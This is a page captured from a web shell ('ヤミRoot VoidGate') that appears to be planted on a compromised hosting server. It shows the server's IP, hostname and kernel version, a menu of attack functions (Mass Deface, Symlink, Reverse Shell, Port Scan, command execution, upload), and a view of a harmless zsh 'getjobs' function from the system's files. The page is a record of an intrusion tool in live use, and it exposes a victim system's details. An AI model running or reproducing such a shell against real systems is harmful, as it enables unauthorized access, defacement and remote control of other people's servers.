ヤミRoot VoidGate
User / IP
:
216.73.216.49
Host / Server
:
146.88.233.70 / www.dev.loger.cm
System
:
Linux hybrid1120.fr.ns.planethoster.net 3.10.0-957.21.2.el7.x86_64 #1 SMP Wed Jun 5 14:26:44 UTC 2019 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
usr
/
share
/
zsh
/
5.0.2
/
functions
/
Viewing: getjobs
# Call this from the preexec function like so: # preexec() { # getjobs "${(z)2}" # Use "${(z)1}" prior to zsh-4.0.1 # } setopt localoptions noshwordsplit noksharrays local texts case $1 in fg|bg) shift; [[ -n $1 ]] || set -- %% ;; %*) ;; *) return 0 ;; esac repeat $# do # This case statement emulates jobs.c:getjob() case $1 in [\;\&\|]|\|\||\&\&) break ;; %(|[%+])) 1=${(k)jobstates[(r)*:+:*]} ;; %-) 1=${(k)jobstates[(r)*:-:*]} ;; %<->) 1=${1#%} ;; %[?]*) 1=${${(Ok)jobtexts[(R)*${1#%[?]}*]}[1]} ;; *) 1=${${(Ok)jobtexts[(R)$1*]}[1]} ;; esac [[ -n $1 ]] && texts=($texts ${jobtexts[$1]}) shift done # Remove the "-s" below if you'd prefer that this just report # what jobs are being affected rather than modify the history (( $#texts )) && print -s ${(j:; :)texts} "$*" return 0
Coded With 💗 by
0x6ick